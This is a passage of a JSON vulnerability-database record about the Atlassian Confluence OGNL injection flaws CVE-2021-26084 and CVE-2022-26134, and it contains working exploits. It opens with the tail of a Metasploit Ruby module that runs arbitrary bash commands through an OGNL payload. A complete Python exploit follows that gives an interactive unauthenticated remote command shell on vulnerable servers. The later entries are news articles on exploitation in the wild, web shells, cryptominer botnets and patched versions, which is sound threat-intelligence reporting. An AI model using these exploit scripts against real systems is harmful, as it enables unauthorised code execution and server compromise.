CheckCode::Safe('Failed to test OGNL injection.') \nend \n \nCheckCode::Vulnerable('Successfully tested OGNL injection.') \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nres = inject_ognl(ognl_payload(cmd)) \n \nunless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/) \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good(\"Successfully executed command: #{cmd}\") \nend \n \ndef inject_ognl(ognl) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'), \n'vars_post' => { \n# https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html \n# https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341 \n'queryString' => Rex::Text.to_hex(ognl, '\\\\u00') \n} \n) \nend \n \ndef ognl_payload(cmd) \n# https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution \n# https://www.tutorialspoint.com/java/lang/class_forname_loader.htm \n# https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html \n# https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html \n<<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '') \n'+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(' \nnew java.lang.ProcessBuilder( \n\"/bin/bash\", \n\"-c\", \nnew java.lang.String( \njava.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\") \n) \n).start() \n')+' \nOGNL \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164122/atlassian_confluence_webwork_ognl_injection.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-01T15:58:38", "description": "", "cvss3": {}, "published": "2021-09-01T00:00:00", "type": "packetstorm", "title": "Confluence Server 7.12.4 OGNL Injection Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "PACKETSTORM:164013", "href": "https://packetstormsecurity.com/files/164013/Confluence-Server-7.12.4-OGNL-Injection-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated) \n# Date: 01/09/2021 \n# Exploit Author: h3v0x \n# Vendor Homepage: https://www.atlassian.com/ \n# Software Link: https://www.atlassian.com/software/confluence/download-archives \n# Version: All < 7.12.x versions before 7.12.5 \n# Tested on: Linux Distros \n# CVE : CVE-2021-26084 \n \n#!/usr/bin/python3 \n \n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html \n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md \n \nimport requests \nfrom bs4 import BeautifulSoup \nimport optparse \n \nparser = optparse.OptionParser() \nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\") \nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\") \n \noptions, args = parser.parse_args() \nsession = requests.Session() \n \nurl_vuln = options.url \nendpoint = options.path \n \nif not options.url or not options.path: \n \nprint('[+] Specify an url target') \nprint('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x') \nprint('[+] Example help usage: exploit.py -h') \nexit() \n \n \ndef banner(): \n \nprint('---------------------------------------------------------------') \nprint('[-] Confluence Server Webwork OGNL injection') \nprint('[-] CVE-2021-26084') \nprint('[-] https://github.com/h3v0x') \nprint('--------------------------------------------------------------- \\n') \n \n \ndef cmdExec(): \n \nwhile True: \ncmd = input('> ') \nxpl_url = url_vuln + endpoint \nxpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"} \nxpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"} \nrawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data) \n \nsoup = BeautifulSoup(rawHTML.text, 'html.parser') \nqueryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] \nprint(queryStringValue) \n \n \nbanner() \ncmdExec() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164013/confluenceserver7124-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-06-03T09:56:17", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgtFRIbOmYLbsTQsfQcmDa8dd7UbU-isTy7dToS2Gy1p7s--Zt-QgfjUpligZQwwZouhjIgGzL8kjD1QlluSfAvuZ7I7GKPJG21wA9tfWYRmChZ7jK57W-8AeMWNQDwHO9tEJkbBfs3AltDvfY7kp3Bl13jp3djDlSN_7F0g5plbOk_BGleGYX9aFNC/s728-e100/hackers.jpg>)\n\nAtlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild.\n\nThe Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as **CVE-2022-26134**.\n\n\"Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server,\" it [said](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) in an advisory.\n\n\"There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix.\" Specifics of the security flaw have been withheld until a software patch is available.\n\nAll supported versions of Confluence Server and Data Center are affected, although it's expected that all versions of the enterprise solution are potentially vulnerable. The earliest impacted version is yet to be ascertained.\n\nIn the absence of a fix, Atlassian is urging customers to restrict Confluence Server and Data Center instances from the internet or consider disabling the instances altogether. Alternatively, it has recommended implementing a web application firewall (WAF) rule which blocks URLs containing \"${\" to reduce the risk.\n\nVolexity, in an independent disclosure, said it detected the activity over the Memorial Day weekend in the U.S. as part of an incident response investigation.\n\nThe attack chain involved leveraging the Atlassian zero-day exploit \u2014 a command injection vulnerability \u2014 to achieve unauthenticated remote code execution on the server, enabling the threat actor to use the foothold to drop the Behinder web shell.\n\n\"[Behinder](<https://github.com/Freakboy/Behinder>) provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike,\" the researchers [said](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). \"At the same time, it does not allow persistence, which means a reboot or service restart will wipe it out.\"\n\nSubsequently, the web shell is said to have been employed as a conduit to deploy two additional web shells to disk, including [China Chopper](<https://www.mandiant.com/resources/the-little-malware-that-could-detecting-and-defeating-the-china-chopper-web-shell>) and a custom file upload shell to exfiltrate arbitrary files to a remote server.\n\nThe development comes less than a year after another critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild to install cryptocurrency miners on compromised servers.\n\n\"By exploiting this kind of vulnerability, attackers can gain direct access to highly sensitive systems and networks,\" Volexity said. \"Further, these systems can often be difficult to investigate, as they lack the appropriate monitoring or logging capabilities.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T03:43:00", "type": "thn", "title": "Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-03T09:27:09", "id": "THN:573D61ED9CCFF01AECC281F8913E42F8", "href": "https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB-3FGATEcQvVgoHD4SeHSMPhxak-CS-oPPNSfU5-5SkLrm94tD5D0FIxx_OoOOtXyQiGBrKcDgRUW2iNO9g17pvv2yWaxWqF27SPffdburUe_xKI1xM67MdF81s7ep1qHWagF0rFoXsRGa15bMeP_43LBSreE8ELfJybJIroA1mHu5NL3se511yT6/s728-e100/jira.jpg>)\n\nAtlassian on Friday rolled out fixes to address a [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution.\n\nTracked as [**CVE-2022-26134**](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>), the issue is similar to [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) \u2014 another security flaw the Australian software company patched in August 2021.\n\nBoth relate to a case of Object-Graph Navigation Language ([OGNL](<https://en.wikipedia.org/wiki/OGNL>)) injection that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\nThe newly discovered shortcoming impacts all supported versions of Confluence Server and Data Center, with every version after 1.3.0 also affected. It's been resolved in the following versions -\n\n * 7.4.17\n * 7.13.7\n * 7.14.3\n * 7.15.2\n * 7.16.4\n * 7.17.4\n * 7.18.1\n\nAccording to stats from internet asset discovery platform [Censys](<https://censys.io/cve-2022-26134-confluenza-omicron-edition/>), there are about 9,325 services across 8,347 distinct hosts running a vulnerable version of Atlassian Confluence, with [most instances](<https://datastudio.google.com/reporting/1fbdf17c-ae37-4501-bd3f-935b72d1f181/page/2DSuC>) located in the U.S., China, Germany, Russia, and France.\n\nEvidence of active exploitation of the flaw, likely by attackers of Chinese origin, came to light after cybersecurity firm Volexity discovered the flaw over the Memorial Day weekend in the U.S. during an incident response investigation.\n\n\"The targeted industries/verticals are quite widespread,\" Steven Adair, founder and president of Volexity, [said](<https://twitter.com/stevenadair/status/1532768026818490371>) in a series of tweets. \"This is a free-for-all where the exploitation seems coordinated.\"\n\n\"It is clear that multiple threat groups and individual actors have the exploit and have been using it in different ways. Some are quite sloppy and others are a bit more stealth.\"\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), besides [adding](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>) the zero-day bug to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), has also urged federal agencies to immediately block all internet traffic to and from the affected products and either apply the patches or remove the instances by June 6, 2022, 5 p.m. ET.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T08:57:00", "type": "thn", "title": "Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-04T08:57:38", "id": "THN:362401076AC227D49D729838DBDC2052", "href": "https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-25T03:59:16", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgdoBO9G0yDmppL5Yi0n5fJErrBKaMuC7dG6RwERnc7-hIOPtwTTc7VYw97fobW9j4IME5hV5wV4dCdPszOUFP0Jt4BStPmj-mS8RhNu-XO2NO1Cm2FJsTQlwQhf3P9JQBfVfYNNzcfuCK60Y1sohM6nJOhYtXOGQ0vgLdwFPeM5UFgATbaR0a9jTDk/s728-e100/hacking.jpg>)\n\nThe **8220 cryptomining group** has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021.\n\n\"8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors,\" Tom Hegel of SentinelOne [said](<https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/>) in a Monday report.\n\nThe growth is said to have been fueled through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis.\n\nActive since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently [seen](<https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html>) targeting i686 and x86_64 Linux systems by means of weaponizing a newly disclosed remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner payload.\n\n\"Victims are not targeted geographically, but simply identified by their internet accessibility,\" Hegel pointed out.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhfnqecztp8liSu5CHTIy0iN3GlH9Yrwr7SxKmg-FHKmY0a3GX3_VtN8O_OCrS2KNReS8UVZRXQ5dAqp-HlfJZsmzJCqDuEZescFEZU-9Rh7o7KGy5PorZzShA-KvhH0Myr8f3Stj-YBKQIzkc73CS_8ZOIRLPDauJO1zH3i1QyGNEcTaowK7niXd0H/s728-e100/malware.jpg>)\n\nBesides executing the PwnRig cryptocurrency miner, the infection script is also designed to remove cloud security tools and carry out SSH brute-forcing via a list of 450 hard-coded credentials to further propagate laterally across the network.\n\nThe newer versions of the script are also known to employ blocklists to avoid compromising specific hosts, such as honeypot servers that could flag their illicit efforts.\n\nThe PwnRig cryptominer, which is based on the open source Monero miner XMRig, has received updates of its own as well, using a fake FBI subdomain with an IP address pointing to a legitimate Brazilian federal government domain to create a rogue [pool](<https://en.wikipedia.org/wiki/Mining_pool>) request and obscure the real destination of the generated money.\n\nThe ramping up of the operations is also viewed as an [attempt](<https://thehackernews.com/2022/07/cloud-based-cryptocurrency-miners.html>) to offset falling prices of cryptocurrencies, not to mention underscore a heightened \"battle\" to take control of victim systems from competing cryptojacking-focused groups.\n\n\"Over the past few years 8220 Gang has slowly evolved their simple, yet effective, Linux infection scripts to expand a botnet and illicit cryptocurrency miner,\" Hegel concluded. \"The group has made changes over the recent weeks to expand the botnet to nearly 30,000 victims globally.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T11:44:00", "type": "thn", "title": "This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-25T03:41:26", "id": "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "href": "https://thehackernews.com/2022/07/this-cloud-botnet-has-hijacked-30000.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:15", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhJ3jtRKAfkDnJBg2CSeJO9eEak4pHCPUwsoYC1yc8-mRtN2fWdq14kYmZ4eITvVA_TkOaz34D7Gfz2LSNKAbVwByP1IbkyZkXFdMhGnjmA1tSd6GffL2DMmgX3VEYI5N3wlRhVqGUmMzGn7YbisQQBHLt_xETCq41gult7pRhYNQ-b2eB8mGAOpaFD>)\n\nOpportunistic threat actors have been found actively exploiting a recently disclosed critical security flaw in Atlassian Confluence deployments across Windows and Linux to deploy web shells that result in the execution of crypto miners on compromised systems.\n\nTracked as **CVE-2021-26084** (CVSS score: 9.8), the vulnerability concerns an OGNL (Object-Graph Navigation Language) injection flaw that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\n\"A remote attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious parameter to a vulnerable server,\" researchers from Trend Micro [noted](<https://www.zerodayinitiative.com/blog/2021/9/21/cve-2021-26084-details-on-the-recently-exploited-atlassian-confluence-ognl-injection-bug>) in a technical write-up detailing the weakness. \"Successful exploitation can result in arbitrary code execution in the security context of the affected server.\"\n\nThe vulnerability, which resides in the Webwork module of Atlassian Confluence Server and Data Center, stems from an insufficient validation of user-supplied input, causing the parser to evaluate rogue commands injected within the OGNL expressions.\n\nThe in-the-wild attacks come after the U.S. Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of mass exploitation attempts following the vulnerability's public disclosure in late August this year.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjXqPkBhwuKJGvxWO_1FjoHCeEAOKy7E3nNIvjWNAaBric3ybUCOe0G41xg2vfrMqSM83zyPKtMMcPzdThUioKg0niqP0et9VrT22pAmRJy9LwQNAVdvO8EvweuRbnJo7aiGWul1cqiTjlXFZw4WyEKmu-Nh6M-u0F-6LxkM2A7vbklzdx2bLU2Afye>)\n\nIn [one such attack](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) observed by Trend Micro, z0Miner, a trojan and cryptojacker, was found updated to leverage the remote code execution (RCE) flaw to distribute next-stage payloads that act as a channel to maintain persistence and deploy cryptocurrency mining software on the machines. Imperva, in an independent analysis, [corroborated the findings](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>), uncovering similar intrusion attempts that were aimed at running the XMRig cryptocurrency miner and other post-exploitation scripts.\n\nAlso detected by Imperva, [Juniper](<https://blogs.juniper.net/en-us/threat-research/muhstik-botnet-targeting-confluence-servers-with-cve-2021-26084>), and [Lacework](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>) is exploitation activity conducted by Muhstik, a China-linked [botnet](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) known for its [wormlike self-propagating capability](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>) to infect Linux servers and IoT devices since at least 2018.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgbIFk6qnQLGyg0h6oyooiekl3f6weqXbcxtTWMY4--VWq6XAjXEMzqzKoFtdfOJrwkHrMnA7zKzbUIZD20ywylRihiM2XgTRt1QSmjWMQkRomZ48jftJM5I_98FvPixhOZqMp_rr6nq7vQBTlnknWVxhVXzyno6XFul5zNkpbdaqmYBM9R--Nxg2HT>)\n\nFurthermore, Palo Alto Networks' Unit 42 threat intelligence team said it [identified and prevented attacks](<https://www.paloaltonetworks.com/blog/security-operations/cve-2021-26084-linux-exploitation-in-the-wild/>) that were orchestrated to upload its customers' password files as well as download malware-laced scripts that dropped a miner and even open an interactive reverse shell on the machine.\n\n\"As is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain,\" Imperva researchers said. \"RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T15:31:00", "type": "thn", "title": "Atlassian Confluence RCE Flaw Abused in Multiple Cyberattack Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-29T03:33:58", "id": "THN:5763EE4C0049A18C83419B000AAB347A", "href": "https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s0/Atlassian-Confluence.jpg>)\n\nThe U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.\n\n\"Mass exploitation of Atlassian Confluence [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is ongoing and expected to accelerate,\" the Cyber National Mission Force (CNMF) [said](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency ([CISA](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>)) and [Atlassian itself](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) in a series of independent advisories.\n\nBad Packets [noted](<https://twitter.com/bad_packets/status/1433157632370511873>) on Twitter it \"detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution.\"\n\nAtlassian Confluence is a widely popular web-based documentation service that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": 